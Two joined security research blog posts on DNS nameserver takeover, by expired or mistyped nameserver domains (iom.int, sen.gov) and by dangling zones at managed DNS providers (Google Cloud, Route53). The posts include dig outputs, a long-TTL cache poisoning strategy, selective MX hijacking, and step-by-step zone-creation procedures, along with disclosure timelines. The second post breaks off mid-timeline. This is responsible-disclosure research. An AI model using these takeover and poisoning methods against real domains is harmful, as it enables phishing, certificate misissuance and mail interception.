In a past piece of research, we explored the issue of nameserver domains expiring allowing us to take over full control of a target domain. In that example we took over the domain name maris.int by buying an expired domain name which was authoritative for the domain. This previous example happened to have two broken nameservers, one being misconfigured and the other being an expired domain name. Due to this combination of issues the domain was totally inaccessible (until I bought the domain and reserved/rehosted the old website again). While this made it easier to take full control of the DNS of the domain (since most clients will automatically fail over to the working nameserver(s)), it also raises an important question. Are there other domains where only some of the nameservers are not working due to them having an expired domain name or some other takeover vulnerability? After all, as discussed in previous posts there are many, different, ways, for a nameserver to become vulnerable to takeover.

A Few Bad Nameservers

In an effort to find a proof-of-concept domain which suffered from having just a few of its nameservers vulnerable to takeover I had to turn back to scanning the Internet. Luckily, since we have an old copy of the .int zone we can start there. After iterating through this list I was able to find yet another vulnerable .int domain: iom.int. This website is totally functional and working but two of its nameservers are actually expired domain names. Interestingly enough, unless you traverse the DNS tree you likely won’t even notice this issue. For example, here’s the output for an NS query against iom.int:

mandatory@script-srchttpsyvgscript ~> dig NS iom.int

; <<>> DiG 9.8.3-P1 <<>> NS iom.int
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9316
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;iom.int.            IN    NS

;; ANSWER SECTION:
iom.int.        86399    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86399    IN    NS    ns1.zrh1.ch.colt.net.

;; Query time: 173 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Dec  8 14:12:47 2016
;; MSG SIZE  rcvd: 81

As we can see from the above output we’ve asked the resolver 8.8.8.8 (Google’s public resolver) for the nameservers of iom.int and it has returned to us ns1.zrh1.ch.colt.net. and ns1.gva.ch.colt.net. with NOERROR as the status. The domain name colt.net is not available and is currently registered, working, and returning DNS records as expected. If this is the case how is this domain vulnerable? It turns out that we are being slightly misled due to the way that dig works. Let’s break down what is happening with dig’s +trace flag:

mandatory@script-srchttpsyvgscript ~> dig iom.int +trace

; <<>> DiG 9.8.3-P1 <<>> iom.int +trace
;; global options: +cmd
.            209756    IN    NS    g.root-servers.net.
.            209756    IN    NS    m.root-servers.net.
.            209756    IN    NS    i.root-servers.net.
.            209756    IN    NS    l.root-servers.net.
.            209756    IN    NS    f.root-servers.net.
.            209756    IN    NS    b.root-servers.net.
.            209756    IN    NS    c.root-servers.net.
.            209756    IN    NS    h.root-servers.net.
.            209756    IN    NS    d.root-servers.net.
.            209756    IN    NS    k.root-servers.net.
.            209756    IN    NS    j.root-servers.net.
.            209756    IN    NS    e.root-servers.net.
.            209756    IN    NS    a.root-servers.net.
;; Received 228 bytes from 172.16.0.1#53(172.16.0.1) in 30 ms

int.            172800    IN    NS    ns.icann.org.
int.            172800    IN    NS    ns1.cs.ucl.ac.uk.
int.            172800    IN    NS    ns.uu.net.
int.            172800    IN    NS    ns0.ja.net.
int.            172800    IN    NS    sec2.authdns.ripe.net.
;; Received 365 bytes from 192.5.5.241#53(192.5.5.241) in 88 ms

iom.int.        86400    IN    NS    ns1.iom.org.ph.
iom.int.        86400    IN    NS    ns2.iom.org.ph.
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.
;; Received 127 bytes from 128.86.1.20#53(128.86.1.20) in 353 ms

iom.int.        86400    IN    A    54.154.14.101
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
;; Received 97 bytes from 212.74.78.22#53(212.74.78.22) in 172 ms

This shows us dig’s process as it traverses the DNS tree. First we can see it asks the root nameservers for the nameservers of the .int  TLD. This gives us results like ns.icann.org, ns1.cs.ucl.ac.uk. etc. Next dig asks one of the returned .int nameservers at random for the nameservers of our target iom.int domain. As we can see from this output there are actually more nameservers which the .int TLD nameservers are recommending to us. However, despite dig receiving these nameservers it hasn’t yet gotten what its looking for. Dig will continue down the delegation chain until it gets an authoritative response. Since the .int TLD nameservers are not authoritative for the iom.int zone they don’t set the authoritative answer flag on the DNS response. DNS servers are supposed to set the authoritative answer flag when they are the owner of a specific zone. This is DNS’s way of saying “stop traversing the DNS tree, I’m the owner of the zone you’re looking for – ask me!”. Completing dig’s walk we see that it picks a random nameserver returned by the .int TLD nameservers and asks it what the nameservers are for the iom.int domain. Since these nameservers are authoritative for the iom.int zone dig takes this answer and returns it to us. Interestingly enough, if dig had encountered some of the non-working nameservers, specifically ns1.iom.org.ph and ns2.iom.org.ph it would simply have failed over to one of the working colt.net nameservers without letting us know.

Domain Availability, Registry Truth & Sketchy DNS Configurations

Note: This is an aside from the main topic, feel free to skip this section if you don’t want to read about .org.ph DNS sketchiness.

When I initially scanned for this vulnerability using some custom software I’d written, I received an alert that iom.org.ph was available for registration. However when I queried for the domain using dig I found something very odd:

mandatory@script-srchttpsyvgscript ~> dig A iom.org.ph 

; <<>> DiG 9.8.3-P1 <<>> A iom.org.ph
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18334
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;iom.org.ph.        IN    A

;; ANSWER SECTION:
iom.org.ph.    299    IN    A    45.79.222.138

;; Query time: 54 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Dec 17 23:35:00 2016
;; MSG SIZE  rcvd: 51

The above query shows that when we look up the A record (IP address) for iom.org.ph we get a valid IP back. So, wait, iom.org.ph is actually responding with a valid record? How are we getting back an A record if the domain doesn’t exist? Things get even more weird when you ask what the nameservers are for the domain:

mandatory@script-srchttpsyvgscript ~> dig NS iom.org.ph 

; <<>> DiG 9.8.3-P1 <<>> NS iom.org.ph
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18589
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;iom.org.ph.        IN    NS

;; AUTHORITY SECTION:
ph.            899    IN    SOA    ph-tld-ns.dot.ph. sysadmin.domains.ph. 2016121814 21600 3600 2592000 86400

;; Query time: 60 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Dec 17 23:34:50 2016
;; MSG SIZE  rcvd: 102

According to dig no nameservers are returned for our domain despite us getting an A record back just a moment ago. How can this be? After trying this query I was even less confident the domain was available at all, so I issued the following query to sanity check myself:

mandatory@script-srchttpsyvgscript ~> dig A ThisCantPossiblyExist.org.ph

; <<>> DiG 9.8.3-P1 <<>> A ThisCantPossiblyExist.org.ph
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65010
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;ThisCantPossiblyExist.org.ph.    IN    A

;; ANSWER SECTION:
ThisCantPossiblyExist.org.ph. 299 IN    A    45.79.222.138

;; Query time: 63 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Dec 17 23:39:24 2016
;; MSG SIZE  rcvd: 62

Ok so apparently all .org.ph domains which don’t exist return an A record. What in the world is at that IP?! The following is a screenshot of what we get when we go to ThisCantPossiblyExist.org.ph:

org.ph.madness

The above makes it fairly clear what’s happening. Instead of simply failing to resolve, the .org.ph TLD nameservers return us an A record to a page filled with questionable advertisements as well as a notice that says “This domain is available to be registered”. Likely this is to make a little extra money from people attempting to visit non-existent domains. I’ll refrain from commenting on the ethics or sketchiness of this tactic and stick to how you can detect this with dig. The following query reveals how this is set up:

mandatory@script-srchttpsyvgscript ~> dig ANY '*.org.ph'

; <<>> DiG 9.8.3-P1 <<>> ANY *.org.ph
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51271
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;*.org.ph.            IN    ANY

;; ANSWER SECTION:
*.org.ph.        299    IN    A    45.79.222.138

;; Query time: 50 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Dec 17 23:49:15 2016
;; MSG SIZE  rcvd: 42

The above query shows that there is a wildcard A record set up for anything that matched *.org.ph. This is why we saw this behaviour.

For an additional sanity check one powerful tool which is always useful is historical data on domains. One of the largest collectors of historical DNS, WHOIS, and general Internet data that I know of is Domain Tools. After reaching out they were kind enough to provide a researcher account for me so I used there database to get the full story of vulnerabilities such as this one. Querying their dataset we can understand when exactly this iom.org.ph domain became vulnerable (expired) in the first place.

iom_old_whois_domain_tools

Interestingly enough, this historical data shows that this domain has likely been expired since 2013. The fact that this issue could have existed for this long shows that this type of vulnerability is subtle enough to go unnoticed for a long time (~4 years!). Crazy.

Back to the Takeover

Moving back to our takeover, once I realized that iom.org.ph was indeed available I was able to register it and become an authoritative nameserver for iom.int. This is similar to the maris.int example but with an interesting caveat. When someone attempts to visit iom.int there is about a 50% chance that our nameservers will be queried instead of the authentic ones. The reason for this is due to Round Robin DNS which is a technique used in DNS to distribute load across multiple servers. The concept is fairly simple, in DNS you can return multiple records for a query if you want to distribute the load across a few servers. Since you want to distribute load evenly you will return these records in a random order so that querying clients will choose a different record each time they request it. In the case of a DNS A record this would mean that if you returned three IP addresses in a random order, you should see that each IP address is used by your users roughly 33.33% of the time. We can see this in action if we attempt a few NS queries for iom.int directly at the .int TLD nameservers. We get the .int TLD nameservers by doing the following:

mandatory@script-srchttpsyvgscript ~> dig NS int.

; <<>> DiG 9.8.3-P1 <<>> NS int.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54471
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;int.                IN    NS

;; ANSWER SECTION:
int.            52121    IN    NS    ns.uu.net.
int.            52121    IN    NS    ns.icann.org.
int.            52121    IN    NS    ns0.ja.net.
int.            52121    IN    NS    ns1.cs.ucl.ac.uk.
int.            52121    IN    NS    sec2.authdns.ripe.net.

;; Query time: 38 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sun Dec 18 00:23:29 2016
;; MSG SIZE  rcvd: 153

We’ll pick one of these at random (ns.uu.net) and ask for the nameservers of iom.int a few times:

mandatory@script-srchttpsyvgscript ~> dig NS iom.int @ns.uu.net.

; <<>> DiG 9.8.3-P1 <<>> NS iom.int @ns.uu.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41151
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;iom.int.            IN    NS

;; AUTHORITY SECTION:
iom.int.        86400    IN    NS    ns1.iom.org.ph.
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86400    IN    NS    ns2.iom.org.ph.
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.

;; Query time: 76 msec
;; SERVER: 137.39.1.3#53(137.39.1.3)
;; WHEN: Sun Dec 18 00:23:35 2016
;; MSG SIZE  rcvd: 127

mandatory@script-srchttpsyvgscript ~> dig NS iom.int @ns.uu.net.

; <<>> DiG 9.8.3-P1 <<>> NS iom.int @ns.uu.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14215
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;iom.int.            IN    NS

;; AUTHORITY SECTION:
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86400    IN    NS    ns2.iom.org.ph.
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.
iom.int.        86400    IN    NS    ns1.iom.org.ph.

;; Query time: 79 msec
;; SERVER: 137.39.1.3#53(137.39.1.3)
;; WHEN: Sun Dec 18 00:23:36 2016
;; MSG SIZE  rcvd: 127

mandatory@script-srchttpsyvgscript ~> dig NS iom.int @ns.uu.net.

; <<>> DiG 9.8.3-P1 <<>> NS iom.int @ns.uu.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31489
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;iom.int.            IN    NS

;; AUTHORITY SECTION:
iom.int.        86400    IN    NS    ns2.iom.org.ph.
iom.int.        86400    IN    NS    ns1.zrh1.ch.colt.net.
iom.int.        86400    IN    NS    ns1.gva.ch.colt.net.
iom.int.        86400    IN    NS    ns1.iom.org.ph.

;; Query time: 87 msec
;; SERVER: 137.39.1.3#53(137.39.1.3)
;; WHEN: Sun Dec 18 00:23:37 2016
;; MSG SIZE  rcvd: 127

As can be seen above, each time we ask we get the nameservers in a different order. This is the beauty of round robin DNS since each nameserver will receive roughly equal load of DNS queries. However this complicates our attack because half of the time users will be querying the legitimate nameservers! So the question now becomes how can we tip the odds in our favor?

May the RR Odds Be Ever in Our Favor

So, we can’t control the behaviour of the .int TLD servers and we’ll only be chosen approximately 50% of the time. As an attacker we need to figure out how to make that closer to 100%. Luckily, due to how DNS is structured, we can get very close.

When you visit www.google.com and your computer does a DNS lookup for that record, it likely isn’t going to traverse the entire DNS tree to get the result. Instead it likely makes use of a DNS resolver which will perform this process on your behalf while caching all of the results. This resolver is assigned to your computer during the DHCP process and can be either a large shared resolver (such as 8.8.8.8, or 8.8.4.4) or a small resolver hosted on your local router or computer. The idea behind the resolver is that it can serve many clients making DNS requests and can speed up resolution by caching results. So if one client looks up www.google.com and shortly after another client does the same, the DNS tree doesn’t have to be traversed because the resolver already has a cached copy. The important point to realize here is that in DNS, caching is king. The side effects of this architecture are made more apparent when events like the DDoS attacks against Dyn that knocked the Internet offline for millions of users happen. As it turns out when you put all your eggs in one basket, you’d better be sure the basket can hold up.

Caching is accomplished by DNS resolvers temporarily storing the results of a DNS query for whatever the response’s TTL has been set to. This means that if a response has a TTL of 120, for example, the caching resolver likely will obey this and return this same record for two minutes. There are upper limits to this value, but its resolver-dependent and likely can be set as long as a week without problems.

Given this situation, we can win this game by setting longer TTLs that our legitimate servers for all of our authoritative responses. The situation essentially boils down into this:

  • User looks up the A record for iom.int to visit the site.
  • Due to the random choosing of nameservers from the .int TLD NS query results, the user has a 50% chance of choosing our poisoned nameserver.
  • Say the user doesn’t choose us and gets the legit nameservers, their resolver will record this result and cache it for the specified TTL of 21,745 seconds (approximately 6 hours). This is the current TTL for this record at the time of this writing.
  • Later on, the user attempts to visit the website after more than 6 hours have passed, again they traverse this tree but this time they get one of our malicious nameservers which we’ve taken over. We reply with a TTL of 604,800 seconds (one week), or with an even longer TTL depending on what we think we can get away with. The user’s cache records this value and will hold it for the length of the TTL we specified.
  • Now for an entire week the user, and, more importantly, all the other clients of the resolver will always use our falsified record.

This example becomes more extreme when you realize that many people and services make use of large resolvers like Google’s public resolvers (8.8.8.8, 8.8.4.4) or Dyn’s (216.146.35.35, 216.146.36.36). On this level its only a matter of time until the resolver picks our poisoned nameservers and we can poison all clients of this resolver (potentially millions) for a long period of time. Even better, with large resolvers we can easily test to see if we’ve succeeded and can act quickly when we know we’ve poisoned the community cache.

The Power of DNS

So, we now can poison the DNS for our target – but what power does this give us? What can we do with our newly gained priveleges?

  • Issue arbitrary SSL/TLS certificates for iom.int: Due to the fact that many certificate authorities allow either DNS, HTTP, or email for domain name verification, we can easily set DNS records for servers we control to prove we own the target domain. Even if the CA chooses our target’s nameservers instead of ours, we can simply request again once the cache expired until they eventually ask our malicious nameservers. This assumes the certificate authority’s certificate issuing system actually performs caching – if it doesn’t we can simply immediately try again until our malicious servers are picked.
  • Targeted Email Interception: Since we can set MX records for our targets, we can set up our malicious servers to watch for DNS requests from specific targets like GMail, Yahoo Mail, or IANA’s mail servers and selectively lie about where to route email. This gives us the benefit of stealth because we can give legitimate responses to everyone querying except for the targets we care about.
  • Takeover of the .int Domain Name Itself: In the case of the .int TLD, if we want to change the owners or the nameservers of this domain at the registry, both the Administrative contact and the Technical contact must approve this change (assuming the policy is the same as IANA’s policy for root nameserver changes which IANA also manages). You can see the example form here on IANA’s website. Since both of the email addresses on the WHOIS are at iom.int as well, so we have the ability to intercept mail for both. We can now wait until we see an MX DNS request from IANA’s IP range and selectively poison the results to redirect the email to our servers, allowing us to send and receive emails as the admin. Testing to see if IANA’s mail servers have been poisoned can be achieved by spoofing emails from iom.int and checking if the bounce email is redirected to our malicious mail servers. If we don’t receive it we simply wait until the TTL of the legit mail servers is over and try again.
  • Easily Phish Credentials: Since we can change DNS we can rewrite the A records to point to our own phishing servers in order to steal employee credentials/etc.
  • MITM Devices via SRV Spoofing: Since we can also control SRV records, we can change these to force embedded devices to connect to our servers instead. This goes for any service which uses DNS for routing (assuming no other validation method is built into the protocol).
  • And much more…

So clearly this is a vulnerability which can occur but does it occur often? Sure maybe one random .int website has this vulnerability but do any actually important websites suffer from this issue?

Not An Isolated Incident

The following is a screenshot from another website which was found to suffer from this same vulnerability as iom.int. This time from something as simple as a typo in the nameserver hostname:

senate_shortener

The vulnerable domain was sen.gov an internal URL shortening service for the United States Senate. The domain had a non-existent domain of ns1-201-akam.net set as an authoritative nameserver. This was likely a typo of ns1-201.akam.net which is a sub-domain belonging to Akamai, this slight mistype has caused a massive security issue where you want it the least. Since the site’s very purpose is to redirect what is assumedly members of the US Senate to random sites from links sent by other members it would be a goldmine for an attacker wishing to do malicious DNS-based redirection for a drive-by exploitation or targeted phishing attacks. Due to the high risk and trivial exploitability of the issue I purchased the nameserver domain myself and simply blocked DNS traffic to that domain (allowing the DNS queries to fail over to the remaining working servers). This essentially “plugged” the issue until it could be fixed by the administrators of the site. Shortly after this I reached out to the .gov registry who forwarded my concerns to the site’s administrators who fixed the issue extremely quickly (see disclosure timeline below). All said and done very impressive response time! This does, however, highlight that this type of issue can happen to anyone. In addition to these two examples outlined here many more exist which are not listed (for obvious reasons), demonstrating that this is not an isolated issue.

Disclosure Timeline

International Organization for Immigration (iom.int) Disclosure

  • Dec 09, 2016: Contacted ocu@ with a request to disclose this issue (contact seemed appropriate per their website).
  • Dec 23, 2016: Due to lack of response forwarded previous email to WHOIS contacts.
  • Dec 23, 2016: Received response from Jackson (Senior Information Security Officer for iom.int) apologizing for missing the earlier email and requesting details of the problem.
  • Dec 23, 2016: Disclosed issue via email.
  • Dec 23, 2016: Confirmed receipt of issue, stating that the problem and implications are understood. States that it will be addressed internally and that an update will be sent when it has been fixed.
  • Dec 27, 2016: Update received from Jackson stating that IANA has been contacted and instructed to remove any reference to the domain iom.org.ph in order to remediate the vulnerability. IANA states that this can take up to five business days to accomplish.
  • Dec 27, 2016: Asked if Jackson would also like the iom.org.ph domain name back or if it should be left to expire.
  • Dec 27, 2016: Jackson confirms the domain name is no longer needed and it’s fine to let it expire.

Disclosure Notes: I got a quick response once I forwarded the info to the correct contacts, I should’ve gone for the broader CC with this disclosure and will have to keep that in mind for future disclosures. Didn’t expect such a quick response (or even a dedicated security person) so it was a nice surprise to have Jackson jump on the problem so fast.

United States Senate (sen.gov) Disclosure

  • January 5, 2017: Reached out to .gov registry requesting responsible disclosure and offering PGP.
  • January 6, 2017: Response received from help desk stating they can forward any concerns to the appropriate contacts if needed.
  • January 6, 2017: Disclosed issue to help desk.
  • January 8, 2017: Nameserver patch applied, all nameservers are now correctly set!

Disclosure Notes: Again, didn’t expect a quick patch like this and was blown away with how quickly this was fixed (less than two days!). In the past government agencies I’ve reported vulnerabilities to have been a super slow process to apply a patch so this was a breathe of fresh air. Really impressed!

Judas DNS – A Tool For Exploiting Nameserver Takeovers

In order to make the process of exploiting this unique type of vulnerability easier I’ve created a proof-of-concept malicious authoritative nameserver which can be used once you’ve taken over a target’s nameserver. The Judas server proxies all DNS requests to the configured legitimate authoritative nameservers while also respecting a custom ruleset to modify DNS responses if certain rule-matching criteria is met. For more information on how it works as well as the full source code see the below link:

Judas DNS Github

Closing Thoughts

This vulnerability has all the trademarks of being a dangerous security issue. Not only is it an easy mistake to make via a typo or an expired nameserver domain, it also does not present any immediately obvious problems for availability due to the failover nature of many DNS clients. This means that not only can it happen to anyone, it means it can also go unnoticed for a long time.

On the topic of remediation, this issue is interesting because it could possibly be mitigated at the TLD-level. If TLD operators did simple DNS health checks to ensure that all domain nameservers had at least the possibility of working (e.g. doing a simple A lookup occasionally to check if an IP address is returned, or look for NXDOMAIN) they could likely prevent this class of hijacking altogether. However, I suspect this would be a heavy handed thing for TLDs to take on and could potentially be prone to error (what about nameservers that only serve private/internal network clients?). After all, if a TLD was to automatically remove nameservers of suspected vulnerable domains and it caused an outage, there would certainly be hell to pay. Still, there is definitely an interesting discussion to be had on how to fix these vulnerabilities at scale.

Credit

Thanks to @Baloo and @kalou000 at Gandi.net for being extremely helpful resources on DNS/Internet-related information. Not many people can quote obscure DNS functionality off-hand so being able to bounce ideas off of them was invaluable. Additionally for providing enterprise access to their domain-checking API for security research purposes (such as this project!). This was amazing for checking domain existence because Gandi (as far as I’m aware), has the largest TLD support of any registrar so they were perfect for this research (Nicaragua? Philippines? Random country in Africa? Yep, TLD supported).

Until next time,

-mandatory

Recently, I found that Digital Ocean suffered from a security vulnerability in their domain import system which allowed for the takeover of 20K domain names. If you haven’t given that post a read I recommend doing so before going through this write up. Originally I had assumed that this issue was specific to Digital Ocean but this couldn’t be farther from the truth as I’ve now learned. It turns out this vulnerability affects just about every popular managed DNS provider on the web. If you run a managed DNS service, it likely affects you too.

The Managed DNS Vulnerability

The root of this vulnerability occurs when a managed DNS provider allows someone to add a domain to their account without any verification of ownership of the domain name itself. This is actually an incredibly common flow and is used in cloud services such as AWS, Google Cloud, Rackspace and of course, Digital Ocean. The issue occurs when a domain name is used with one of these cloud services and the zone is later deleted without also changing the domain’s nameservers. This means that the domain is still fully set up for use in the cloud service but has no account with a zone file to control it. In many cloud providers this means that anyone can create a DNS zone for that domain and take full control over the domain. This allows an attacker to take full control over the domain to set up a website, issue SSL/TLS certificates, host email, etc. Worse yet, after combining the results from the various providers affected by this problem over 120,000 domains were vulnerable (likely many more).

Detecting Vulnerable Domains via DNS

Detecting this vulnerability is a fairly interesting process, it can be enumerated via a simple DNS NS query run against the target’s nameservers. If the domain is vulnerable then the nameservers will return either a SERVFAIL or REFUSED DNS error. The following is an example query using the dig DNS tool:

ubuntu@ip-172-30-0-49:~/$ dig NS zz[REDACTED].net

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS zz[REDACTED].net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62335
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;zz[REDACTED].net.                 IN      NS

;; Query time: 73 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Sat Sep 17 16:46:30 PDT 2016
;; MSG SIZE  rcvd: 42

The above response shows we’ve received a DNS SERVFAIL error indicating that this domain is vulnerable.

If we get a SERVFAIL response how are we supposed to know what the actual nameservers are for this domain are? Actually, dig has already found what nameservers the domain has but just hasn’t displayed them to us. DNS queries for a domain’s nameservers usually follow the following process:

  • Query the DNS root nameservers for the list of nameservers belonging to the domain’s TLD (in this case, .net).
  • Query one of the nameservers for the specified TLD of the domain for the nameservers of the domain.
  • Query the returned nameservers for the domain for the nameservers for the domain (unclear why dig does this, considering you already know what they are from the nameservers from the .net nameservers).

*Note that many of these steps will be skipped if the results are already cached by your resolver.

The last step is what is causing dig to return this SERVFAIL error, we’ll skip it and just ask the nameservers for the .net TLD directly. First we’ll query what those are:

ubuntu@ip-172-30-0-49:~$ dig NS net.

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 624
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;net.                           IN      NS

;; ANSWER SECTION:
net.                    2597    IN      NS      b.gtld-servers.net.
net.                    2597    IN      NS      c.gtld-servers.net.
net.                    2597    IN      NS      d.gtld-servers.net.
net.                    2597    IN      NS      e.gtld-servers.net.
net.                    2597    IN      NS      f.gtld-servers.net.
net.                    2597    IN      NS      g.gtld-servers.net.
net.                    2597    IN      NS      h.gtld-servers.net.
net.                    2597    IN      NS      i.gtld-servers.net.
net.                    2597    IN      NS      j.gtld-servers.net.
net.                    2597    IN      NS      k.gtld-servers.net.
net.                    2597    IN      NS      l.gtld-servers.net.
net.                    2597    IN      NS      m.gtld-servers.net.
net.                    2597    IN      NS      a.gtld-servers.net.

;; Query time: 7 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Sat Sep 17 16:53:54 PDT 2016
;; MSG SIZE  rcvd: 253

Now we can query one of these nameservers for the nameservers of our target domain:

ubuntu@ip-172-30-0-49:~$ dig NS zz[REDACTED].net @a.gtld-servers.net.

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS zz[REDACTED].net @a.gtld-servers.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3529
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;zz[REDACTED].net.                 IN      NS

;; AUTHORITY SECTION:
zz[REDACTED].net.          172800  IN      NS      dns1.stabletransit.com.
zz[REDACTED].net.          172800  IN      NS      dns2.stabletransit.com.

;; ADDITIONAL SECTION:
dns1.stabletransit.com. 172800  IN      A       69.20.95.4
dns2.stabletransit.com. 172800  IN      A       65.61.188.4

;; Query time: 9 msec
;; SERVER: 192.5.6.30#53(192.5.6.30)
;; WHEN: Sat Sep 17 16:54:48 PDT 2016
;; MSG SIZE  rcvd: 129

Now we can see that the nameservers for this domain are dns1.stabletransit.com and dns2.stabletransit.com and can target this set of nameservers specifically.

In order to find a list of domains vulnerable to this issue I used my copies of the zone files for the .com and .net TLDs which are available via Verisign (you have to apply to get access). These zone files have a list of every .com, and .net domain name along with what nameservers they use. Using this data we can find all domains which are hosted by a specific cloud provider because their nameservers will be those of these cloud providers. Once we have a list for a specific provider we can use a small Python script to query each domain to probe for the SERVFAIL or REFUSED DNS errors. Finally, we then use the cloud management panel to see if we can add these domains to our account, confirming the vulnerability exists.

Google Cloud DNS (~2.5K Domains Affected, Patched)

Google’s Cloud offering includes a managed DNS service line which has an easy import process for new domains. Documentation for doing so can be found here. The general process for doing so is the following:

  • Go to the DNS management panel of your Google Cloud account: https://console.cloud.google.com/networking/dns
  • Click the “+ Create Zone” button.
  • Create a new zone with any name and a “DNS Name” of the vulnerable domain.
  • Click the “Create” button to create this new zone.
  • Note the list of nameservers that have been returned to you, in this example I’ve received the following:google-cloud-returned-nameservers
  • Check if the nameservers match the target nameservers, if they don’t just delete the zone and try again.
  • Once you’ve finally gotten a matching list of nameservers you now have full control of the DNS for that domain.

Disclosure & Remediation Timeline

  • Sep 9, 2016: Reported issue to Google bug bounty program, provided a list of vulnerable domains as well.
  • Sep 9, 2016: Report triaged by Google Security Team.
  • Sep 9, 2016: Vulnerability confirmed, internal bug filed for the issue.
  • Sep 13, 2016: Reward of $1,337 awarded, donation matching available if given to a charity.
  • Sep 14, 2016: Requested the reward be given to the Tor Project (making the donation $2,674). Received a Tor hoodie/swag :)from the Tor folks – thanks guys/gals!

Amazon Web Services – Route53 (~54K Domains Affected, Multiple Mitigations Performed)

Amazon’s managed DNS service line is called Route53. They have a number of nameservers which they randomly return to you which are distributed across multiple domains and TLDs. Previously I thought this was to defend against this specific type of vulnerability, however, since they are vulnerable I believe that this was more done to ensure uptime in the case of a TLD experiencing DNS issues.

The domain process for Route53 is complicated by the fact that they have a wide range of nameservers which can be returned to you. However the following process allows you to take over a target domain in just a few minutes. In order to automate this process I wrote a small Python proof-of-concept script which would create and delete Route53 zones until the proper nameservers were returned. One unique property of this vulnerability for Route53 was that you could get just one of the target’s nameservers returned to you instead of all four in a set like other managed DNS providers. This turns out to be just fine from an exploit scenario because you can simply keep the zone with three incorrect nameservers and one correct nameserver and keep creating zones until you have a couple zones with just one target nameserver in each zone. Then you can just replicate your DNS records across these four zones to set DNS for the target.

The process for this is as follows:

  • Use the AWS Route53 API to create a new zone for a target domain.
  • Check the resulting nameservers that were returned for this zone, if any of the nameservers match the target’s nameservers then keep the zone and remove it from the list of targeted nameservers. The following is an example of the nameservers returned for a domain:

route53_returned_nameservers

  • If none are shared with the target nameserver set, delete the zone.
  • Keep repeating this process until you have X number of zones which have all of the target’s vulnerable nameservers.
  • Now just create the DNS record you’d like for the target domain across all zones.

The following is a redacted example of creating four zones for a target domain, each zone containing just one of the target’s nameservers:

four_zones_awsUsing this method we can reliably takeover any of these 54K domains.

Disclosure & Remediation Timeline

  • Sep 5, 2016: Contacted AWS security using PGP describing the full scope of the issue and with an attached list of vulnerable domains.
  • Sep 5, 2016: (less than an hour from first contact): Response from AWS stating they will investigate immediately and follow up as soon as they know more.
